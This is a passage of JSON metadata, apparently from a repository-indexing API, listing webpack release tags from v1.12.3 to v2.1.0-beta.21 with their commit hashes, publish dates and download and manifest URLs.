hub.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T